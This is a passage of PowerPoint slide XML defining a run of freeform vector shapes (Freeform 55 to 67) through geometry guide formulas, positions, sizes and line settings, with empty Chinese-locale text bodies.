                <a:gd name="T28" fmla="*/ 5 w 1471"/>
                <a:gd name="T29" fmla="*/ 1 h 944"/>
                <a:gd name="T30" fmla="*/ 6 w 1471"/>
                <a:gd name="T31" fmla="*/ 2 h 944"/>
                <a:gd name="T32" fmla="*/ 6 w 1471"/>
                <a:gd name="T33" fmla="*/ 2 h 944"/>
                <a:gd name="T34" fmla="*/ 5 w 1471"/>
                <a:gd name="T35" fmla="*/ 2 h 944"/>
                <a:gd name="T36" fmla="*/ 5 w 1471"/>
                <a:gd name="T37" fmla="*/ 3 h 944"/>
                <a:gd name="T38" fmla="*/ 4 w 1471"/>
                <a:gd name="T39" fmla="*/ 3 h 944"/>
                <a:gd name="T40" fmla="*/ 4 w 1471"/>
                <a:gd name="T41" fmla="*/ 3 h 944"/>
                <a:gd name="T42" fmla="*/ 3 w 1471"/>
                <a:gd name="T43" fmla="*/ 3 h 944"/>
                <a:gd name="T44" fmla="*/ 3 w 1471"/>
                <a:gd name="T45" fmla="*/ 3 h 944"/>
                <a:gd name="T46" fmla="*/ 2 w 1471"/>
                <a:gd name="T47" fmla="*/ 3 h 944"/>
                <a:gd name="T48" fmla="*/ 2 w 1471"/>
                <a:gd name="T49" fmla="*/ 3 h 944"/>
                <a:gd name="T50" fmla="*/ 2 w 1471"/>
                <a:gd name="T51" fmla="*/ 3 h 944"/>
                <a:gd name="T52" fmla="*/ 2 w 1471"/>
                <a:gd name="T53" fmla="*/ 3 h 944"/>
                <a:gd name="T54" fmla="*/ 3 w 1471"/>
                <a:gd name="T55" fmla="*/ 2 h 944"/>
                <a:gd name="T56" fmla="*/ 3 w 1471"/>
                <a:gd name="T57" fmla="*/ 2 h 944"/>
                <a:gd name="T58" fmla="*/ 1 w 1471"/>
                <a:gd name="T59" fmla="*/ 2 h 944"/>
                <a:gd name="T60" fmla="*/ 1 w 1471"/>
                <a:gd name="T61" fmla="*/ 2 h 944"/>
                <a:gd name="T62" fmla="*/ 1 w 1471"/>
                <a:gd name="T63" fmla="*/ 2 h 944"/>
                <a:gd name="T64" fmla="*/ 1 w 1471"/>
                <a:gd name="T65" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1082" name="Freeform 55"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="904" y="3400"/>
              <a:ext cx="341" cy="61"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1023"/>
                <a:gd name="T1" fmla="*/ 1 h 182"/>
                <a:gd name="T2" fmla="*/ 1 w 1023"/>
                <a:gd name="T3" fmla="*/ 0 h 182"/>
                <a:gd name="T4" fmla="*/ 2 w 1023"/>
                <a:gd name="T5" fmla="*/ 0 h 182"/>
                <a:gd name="T6" fmla="*/ 3 w 1023"/>
                <a:gd name="T7" fmla="*/ 0 h 182"/>
                <a:gd name="T8" fmla="*/ 3 w 1023"/>
                <a:gd name="T9" fmla="*/ 0 h 182"/>
                <a:gd name="T10" fmla="*/ 4 w 1023"/>
                <a:gd name="T11" fmla="*/ 0 h 182"/>
                <a:gd name="T12" fmla="*/ 4 w 1023"/>
                <a:gd name="T13" fmla="*/ 0 h 182"/>
                <a:gd name="T14" fmla="*/ 4 w 1023"/>
                <a:gd name="T15" fmla="*/ 0 h 182"/>
                <a:gd name="T16" fmla="*/ 3 w 1023"/>
                <a:gd name="T17" fmla="*/ 1 h 182"/>
                <a:gd name="T18" fmla="*/ 3 w 1023"/>
                <a:gd name="T19" fmla="*/ 0 h 182"/>
                <a:gd name="T20" fmla="*/ 1 w 1023"/>
                <a:gd name="T21" fmla="*/ 1 h 182"/>
                <a:gd name="T22" fmla="*/ 0 w 1023"/>
                <a:gd name="T23" fmla="*/ 1 h 182"/>
                <a:gd name="T24" fmla="*/ 0 w 1023"/>
                <a:gd name="T25" fmla="*/ 1 h 182"/>
                <a:gd name="T26" fmla="*/ 0 w 1023"/>
                <a:gd name="T27" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1083" name="Freeform 56"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="872" y="3127"/>
              <a:ext cx="64" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 194"/>
                <a:gd name="T1" fmla="*/ 0 h 192"/>
                <a:gd name="T2" fmla="*/ 1 w 194"/>
                <a:gd name="T3" fmla="*/ 0 h 192"/>
                <a:gd name="T4" fmla="*/ 1 w 194"/>
                <a:gd name="T5" fmla="*/ 1 h 192"/>
                <a:gd name="T6" fmla="*/ 0 w 194"/>
                <a:gd name="T7" fmla="*/ 1 h 192"/>
                <a:gd name="T8" fmla="*/ 0 w 194"/>
                <a:gd name="T9" fmla="*/ 1 h 192"/>
                <a:gd name="T10" fmla="*/ 0 w 194"/>
                <a:gd name="T11" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1084" name="Freeform 57"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1196" y="3120"/>
              <a:ext cx="63" cy="87"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 187"/>
                <a:gd name="T1" fmla="*/ 0 h 261"/>
                <a:gd name="T2" fmla="*/ 0 w 187"/>
                <a:gd name="T3" fmla="*/ 0 h 261"/>
                <a:gd name="T4" fmla="*/ 1 w 187"/>
                <a:gd name="T5" fmla="*/ 1 h 261"/>
                <a:gd name="T6" fmla="*/ 1 w 187"/>
                <a:gd name="T7" fmla="*/ 1 h 261"/>
                <a:gd name="T8" fmla="*/ 0 w 187"/>
                <a:gd name="T9" fmla="*/ 1 h 261"/>
                <a:gd name="T10" fmla="*/ 0 w 187"/>
                <a:gd name="T11" fmla="*/ 1 h 261"/>
                <a:gd name="T12" fmla="*/ 0 w 187"/>
                <a:gd name="T13" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1085" name="Freeform 58"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1029" y="3308"/>
              <a:ext cx="85" cy="40"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 257"/>
                <a:gd name="T1" fmla="*/ 0 h 120"/>
                <a:gd name="T2" fmla="*/ 0 w 257"/>
                <a:gd name="T3" fmla="*/ 0 h 120"/>
                <a:gd name="T4" fmla="*/ 0 w 257"/>
                <a:gd name="T5" fmla="*/ 0 h 120"/>
                <a:gd name="T6" fmla="*/ 1 w 257"/>
                <a:gd name="T7" fmla="*/ 0 h 120"/>
                <a:gd name="T8" fmla="*/ 1 w 257"/>
                <a:gd name="T9" fmla="*/ 0 h 120"/>
                <a:gd name="T10" fmla="*/ 1 w 257"/>
                <a:gd name="T11" fmla="*/ 0 h 120"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1086" name="Freeform 59"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="903" y="3256"/>
              <a:ext cx="93" cy="54"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 277"/>
                <a:gd name="T1" fmla="*/ 1 h 162"/>
                <a:gd name="T2" fmla="*/ 0 w 277"/>
                <a:gd name="T3" fmla="*/ 0 h 162"/>
                <a:gd name="T4" fmla="*/ 1 w 277"/>
                <a:gd name="T5" fmla="*/ 0 h 162"/>
                <a:gd name="T6" fmla="*/ 1 w 277"/>
                <a:gd name="T7" fmla="*/ 0 h 162"/>
                <a:gd name="T8" fmla="*/ 1 w 277"/>
                <a:gd name="T9" fmla="*/ 0 h 162"/>
                <a:gd name="T10" fmla="*/ 1 w 277"/>
                <a:gd name="T11" fmla="*/ 0 h 162"/>
                <a:gd name="T12" fmla="*/ 0 w 277"/>
                <a:gd name="T13" fmla="*/ 1 h 162"/>
                <a:gd name="T14" fmla="*/ 0 w 277"/>
                <a:gd name="T15" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1087" name="Freeform 60"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1158" y="3270"/>
              <a:ext cx="99" cy="49"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 298"/>
                <a:gd name="T1" fmla="*/ 0 h 147"/>
                <a:gd name="T2" fmla="*/ 1 w 298"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 298"/>
                <a:gd name="T5" fmla="*/ 0 h 147"/>
                <a:gd name="T6" fmla="*/ 1 w 298"/>
                <a:gd name="T7" fmla="*/ 1 h 147"/>
                <a:gd name="T8" fmla="*/ 1 w 298"/>
                <a:gd name="T9" fmla="*/ 1 h 147"/>
                <a:gd name="T10" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1088" name="Freeform 61"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="849" y="3189"/>
              <a:ext cx="112" cy="83"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 335"/>
                <a:gd name="T1" fmla="*/ 0 h 249"/>
                <a:gd name="T2" fmla="*/ 0 w 335"/>
                <a:gd name="T3" fmla="*/ 1 h 249"/>
                <a:gd name="T4" fmla="*/ 0 w 335"/>
                <a:gd name="T5" fmla="*/ 1 h 249"/>
                <a:gd name="T6" fmla="*/ 1 w 335"/>
                <a:gd name="T7" fmla="*/ 1 h 249"/>
                <a:gd name="T8" fmla="*/ 1 w 335"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1089" name="Freeform 62"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1141" y="3196"/>
              <a:ext cx="128" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 385"/>
                <a:gd name="T1" fmla="*/ 0 h 191"/>
                <a:gd name="T2" fmla="*/ 0 w 385"/>
                <a:gd name="T3" fmla="*/ 0 h 191"/>
                <a:gd name="T4" fmla="*/ 0 w 385"/>
                <a:gd name="T5" fmla="*/ 1 h 191"/>
                <a:gd name="T6" fmla="*/ 1 w 385"/>
                <a:gd name="T7" fmla="*/ 1 h 191"/>
                <a:gd name="T8" fmla="*/ 2 w 385"/>
                <a:gd name="T9" fmla="*/ 1 h 191"/>
                <a:gd name="T10" fmla="*/ 1 w 385"/>
                <a:gd name="T11" fmla="*/ 0 h 191"/>
                <a:gd name="T12" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1090" name="Freeform 63"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="854" y="3229"/>
              <a:ext cx="146" cy="78"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 438"/>
                <a:gd name="T1" fmla="*/ 0 h 236"/>
                <a:gd name="T2" fmla="*/ 2 w 438"/>
                <a:gd name="T3" fmla="*/ 0 h 236"/>
                <a:gd name="T4" fmla="*/ 1 w 438"/>
                <a:gd name="T5" fmla="*/ 0 h 236"/>
                <a:gd name="T6" fmla="*/ 0 w 438"/>
                <a:gd name="T7" fmla="*/ 0 h 236"/>
                <a:gd name="T8" fmla="*/ 0 w 438"/>
                <a:gd name="T9" fmla="*/ 0 h 236"/>
                <a:gd name="T10" fmla="*/ 0 w 438"/>
                <a:gd name="T11" fmla="*/ 1 h 236"/>
                <a:gd name="T12" fmla="*/ 0 w 438"/>
                <a:gd name="T13" fmla="*/ 1 h 236"/>
                <a:gd name="T14" fmla="*/ 1 w 438"/>
                <a:gd name="T15" fmla="*/ 0 h 236"/>
                <a:gd name="T16" fmla="*/ 1 w 438"/>
                <a:gd name="T17" fmla="*/ 0 h 236"/>
                <a:gd name="T18" fmla="*/ 2 w 438"/>
                <a:gd name="T19" fmla="*/ 0 h 236"/>
                <a:gd name="T20" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1091" name="Freeform 64"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="774" y="3032"/>
              <a:ext cx="619" cy="562"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 1857"/>
                <a:gd name="T1" fmla="*/ 4 h 1687"/>
                <a:gd name="T2" fmla="*/ 6 w 1857"/>
                <a:gd name="T3" fmla="*/ 5 h 1687"/>
                <a:gd name="T4" fmla="*/ 6 w 1857"/>
                <a:gd name="T5" fmla="*/ 6 h 1687"/>
                <a:gd name="T6" fmla="*/ 6 w 1857"/>
                <a:gd name="T7" fmla="*/ 7 h 1687"/>
                <a:gd name="T8" fmla="*/ 5 w 1857"/>
                <a:gd name="T9" fmla="*/ 7 h 1687"/>
                <a:gd name="T10" fmla="*/ 5 w 1857"/>
                <a:gd name="T11" fmla="*/ 7 h 1687"/>
                <a:gd name="T12" fmla="*/ 2 w 1857"/>
                <a:gd name="T13" fmla="*/ 7 h 1687"/>
                <a:gd name="T14" fmla="*/ 1 w 1857"/>
                <a:gd name="T15" fmla="*/ 7 h 1687"/>
                <a:gd name="T16" fmla="*/ 1 w 1857"/>
                <a:gd name="T17" fmla="*/ 6 h 1687"/>
                <a:gd name="T18" fmla="*/ 0 w 1857"/>
                <a:gd name="T19" fmla="*/ 6 h 1687"/>
                <a:gd name="T20" fmla="*/ 0 w 1857"/>
                <a:gd name="T21" fmla="*/ 5 h 1687"/>
                <a:gd name="T22" fmla="*/ 0 w 1857"/>
                <a:gd name="T23" fmla="*/ 5 h 1687"/>
                <a:gd name="T24" fmla="*/ 0 w 1857"/>
                <a:gd name="T25" fmla="*/ 5 h 1687"/>
                <a:gd name="T26" fmla="*/ 0 w 1857"/>
                <a:gd name="T27" fmla="*/ 6 h 1687"/>
                <a:gd name="T28" fmla="*/ 1 w 1857"/>
                <a:gd name="T29" fmla="*/ 6 h 1687"/>
                <a:gd name="T30" fmla="*/ 1 w 1857"/>
                <a:gd name="T31" fmla="*/ 6 h 1687"/>
                <a:gd name="T32" fmla="*/ 2 w 1857"/>
                <a:gd name="T33" fmla="*/ 7 h 1687"/>
                <a:gd name="T34" fmla="*/ 3 w 1857"/>
                <a:gd name="T35" fmla="*/ 6 h 1687"/>
                <a:gd name="T36" fmla="*/ 5 w 1857"/>
                <a:gd name="T37" fmla="*/ 7 h 1687"/>
                <a:gd name="T38" fmla="*/ 5 w 1857"/>
                <a:gd name="T39" fmla="*/ 7 h 1687"/>
                <a:gd name="T40" fmla="*/ 6 w 1857"/>
                <a:gd name="T41" fmla="*/ 6 h 1687"/>
                <a:gd name="T42" fmla="*/ 6 w 1857"/>
                <a:gd name="T43" fmla="*/ 6 h 1687"/>
                <a:gd name="T44" fmla="*/ 6 w 1857"/>
                <a:gd name="T45" fmla="*/ 5 h 1687"/>
                <a:gd name="T46" fmla="*/ 6 w 1857"/>
                <a:gd name="T47" fmla="*/ 4 h 1687"/>
                <a:gd name="T48" fmla="*/ 7 w 1857"/>
                <a:gd name="T49" fmla="*/ 2 h 1687"/>
                <a:gd name="T50" fmla="*/ 7 w 1857"/>
                <a:gd name="T51" fmla="*/ 1 h 1687"/>
                <a:gd name="T52" fmla="*/ 7 w 1857"/>
                <a:gd name="T53" fmla="*/ 1 h 1687"/>
                <a:gd name="T54" fmla="*/ 7 w 1857"/>
                <a:gd name="T55" fmla="*/ 0 h 1687"/>
                <a:gd name="T56" fmla="*/ 6 w 1857"/>
                <a:gd name="T57" fmla="*/ 0 h 1687"/>
                <a:gd name="T58" fmla="*/ 6 w 1857"/>
                <a:gd name="T59" fmla="*/ 0 h 1687"/>
                <a:gd name="T60" fmla="*/ 7 w 1857"/>
                <a:gd name="T61" fmla="*/ 0 h 1687"/>
                <a:gd name="T62" fmla="*/ 7 w 1857"/>
                <a:gd name="T63" fmla="*/ 0 h 1687"/>
                <a:gd name="T64" fmla="*/ 8 w 1857"/>
                <a:gd name="T65" fmla="*/ 1 h 1687"/>
                <a:gd name="T66" fmla="*/ 7 w 1857"/>
                <a:gd name="T67" fmla="*/ 1 h 1687"/>
                <a:gd name="T68" fmla="*/ 7 w 1857"/>
                <a:gd name="T69" fmla="*/ 2 h 1687"/>
                <a:gd name="T70" fmla="*/ 7 w 1857"/>
                <a:gd name="T71" fmla="*/ 3 h 1687"/>
                <a:gd name="T72" fmla="*/ 7 w 1857"/>
                <a:gd name="T73" fmla="*/ 4 h 1687"/>
                <a:gd name="T74" fmla="*/ 7 w 1857"/>
                <a:gd name="T75" fmla="*/ 4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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1092" name="Freeform 65"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="756" y="3002"/>
              <a:ext cx="591" cy="398"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 1774"/>
                <a:gd name="T1" fmla="*/ 2 h 1195"/>
                <a:gd name="T2" fmla="*/ 7 w 1774"/>
                <a:gd name="T3" fmla="*/ 2 h 1195"/>
                <a:gd name="T4" fmla="*/ 7 w 1774"/>
                <a:gd name="T5" fmla="*/ 1 h 1195"/>
                <a:gd name="T6" fmla="*/ 6 w 1774"/>
                <a:gd name="T7" fmla="*/ 0 h 1195"/>
                <a:gd name="T8" fmla="*/ 6 w 1774"/>
                <a:gd name="T9" fmla="*/ 0 h 1195"/>
                <a:gd name="T10" fmla="*/ 5 w 1774"/>
                <a:gd name="T11" fmla="*/ 0 h 1195"/>
                <a:gd name="T12" fmla="*/ 3 w 1774"/>
                <a:gd name="T13" fmla="*/ 0 h 1195"/>
                <a:gd name="T14" fmla="*/ 1 w 1774"/>
                <a:gd name="T15" fmla="*/ 0 h 1195"/>
                <a:gd name="T16" fmla="*/ 1 w 1774"/>
                <a:gd name="T17" fmla="*/ 1 h 1195"/>
                <a:gd name="T18" fmla="*/ 0 w 1774"/>
                <a:gd name="T19" fmla="*/ 1 h 1195"/>
                <a:gd name="T20" fmla="*/ 0 w 1774"/>
                <a:gd name="T21" fmla="*/ 2 h 1195"/>
                <a:gd name="T22" fmla="*/ 0 w 1774"/>
                <a:gd name="T23" fmla="*/ 3 h 1195"/>
                <a:gd name="T24" fmla="*/ 0 w 1774"/>
                <a:gd name="T25" fmla="*/ 4 h 1195"/>
                <a:gd name="T26" fmla="*/ 0 w 1774"/>
                <a:gd name="T27" fmla="*/ 5 h 1195"/>
                <a:gd name="T28" fmla="*/ 0 w 1774"/>
                <a:gd name="T29" fmla="*/ 5 h 1195"/>
                <a:gd name="T30" fmla="*/ 0 w 1774"/>
                <a:gd name="T31" fmla="*/ 4 h 1195"/>
                <a:gd name="T32" fmla="*/ 0 w 1774"/>
                <a:gd name="T33" fmla="*/ 4 h 1195"/>
                <a:gd name="T34" fmla="*/ 0 w 1774"/>
                <a:gd name="T35" fmla="*/ 3 h 1195"/>
                <a:gd name="T36" fmla="*/ 0 w 1774"/>
                <a:gd name="T37" fmla="*/ 2 h 1195"/>
                <a:gd name="T38" fmla="*/ 0 w 1774"/>
                <a:gd name="T39" fmla="*/ 1 h 1195"/>
                <a:gd name="T40" fmla="*/ 1 w 1774"/>
                <a:gd name="T41" fmla="*/ 1 h 1195"/>
                <a:gd name="T42" fmla="*/ 2 w 1774"/>
                <a:gd name="T43" fmla="*/ 0 h 1195"/>
                <a:gd name="T44" fmla="*/ 3 w 1774"/>
                <a:gd name="T45" fmla="*/ 0 h 1195"/>
                <a:gd name="T46" fmla="*/ 5 w 1774"/>
                <a:gd name="T47" fmla="*/ 0 h 1195"/>
                <a:gd name="T48" fmla="*/ 6 w 1774"/>
                <a:gd name="T49" fmla="*/ 0 h 1195"/>
                <a:gd name="T50" fmla="*/ 6 w 1774"/>
                <a:gd name="T51" fmla="*/ 1 h 1195"/>
                <a:gd name="T52" fmla="*/ 7 w 1774"/>
                <a:gd name="T53" fmla="*/ 1 h 1195"/>
                <a:gd name="T54" fmla="*/ 7 w 1774"/>
                <a:gd name="T55" fmla="*/ 2 h 1195"/>
                <a:gd name="T56" fmla="*/ 7 w 1774"/>
                <a:gd name="T57" fmla="*/ 2 h 1195"/>
                <a:gd name="T58" fmla="*/ 7 w 1774"/>
                <a:gd name="T59" fmla="*/ 2 h 1195"/>
                <a:gd name="T60" fmla="*/ 7 w 1774"/>
                <a:gd name="T61" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1093" name="Freeform 66"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="743" y="3033"/>
              <a:ext cx="123" cy="147"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 369"/>
                <a:gd name="T1" fmla="*/ 0 h 441"/>
                <a:gd name="T2" fmla="*/ 1 w 369"/>
                <a:gd name="T3" fmla="*/ 0 h 441"/>
                <a:gd name="T4" fmla="*/ 0 w 369"/>
                <a:gd name="T5" fmla="*/ 0 h 441"/>
                <a:gd name="T6" fmla="*/ 0 w 369"/>
                <a:gd name="T7" fmla="*/ 1 h 441"/>
                <a:gd name="T8" fmla="*/ 0 w 369"/>
                <a:gd name="T9" fmla="*/ 2 h 441"/>
                <a:gd name="T10" fmla="*/ 0 w 369"/>
                <a:gd name="T11" fmla="*/ 1 h 441"/>
                <a:gd name="T12" fmla="*/ 0 w 369"/>
                <a:gd name="T13" fmla="*/ 1 h 441"/>
                <a:gd name="T14" fmla="*/ 1 w 369"/>
                <a:gd name="T15" fmla="*/ 0 h 441"/>
                <a:gd name="T16" fmla="*/ 1 w 369"/>
                <a:gd name="T17" fmla="*/ 0 h 441"/>
                <a:gd name="T18" fmla="*/ 2 w 369"/>
                <a:gd name="T19" fmla="*/ 0 h 441"/>
                <a:gd name="T20" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1094" name="Freeform 67"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1026" y="3265"/>
              <a:ext cx="96" cy="48"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 289"/>
                <a:gd name="T1" fmla="*/ 1 h 144"/>
                <a:gd name="T2" fmla="*/ 1 w 289"/>
                <a:gd name="T3" fmla="*/ 0 h 144"/>
                <a:gd name="T4" fmla="*/ 1 w 289"/>
                <a:gd name="T5" fmla="*/ 0 h 144"/>
                <a:gd name="T6" fmla="*/ 1 w 289"/>
                <a:gd name="T7" fmla="*/ 0 h 144"/>
                <a:gd name="T8" fmla="*/ 1 w 289"/>
                <a:gd name="T9" fmla="*/ 0 h 144"/>
                <a:gd name="T10" fmla="*/ 0 w 289"/>
                <a:gd name="T11" fmla="*/ 0 h 144"/>
                <a:gd name="T12" fmla="*/ 0 w 289"/>
                <a:gd name="T13" fmla="*/ 1 h 144"/>
                <a:gd name="T14" fmla="*/ 0 w 289"/>
                <a:gd name="T15" fmla="*/ 0 h 144"/>
                <a:gd name="T16" fmla="*/ 1 w 289"/>
                <a:gd name="T17" fmla="*/ 0 h 144"/>
                <a:gd name="T18" fmla="*/ 1 w 289"/>
                <a:gd name="T19" fmla="*/ 0 h 144"/>
                <a:gd name="T20" fmla="*/ 1 w 289"/>
                <a:gd name="T21" fmla="*/ 1 h 144"/>
                <a:gd name="T22" fmla="*/ 1 w 289"/>
                <a:gd name="T23" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
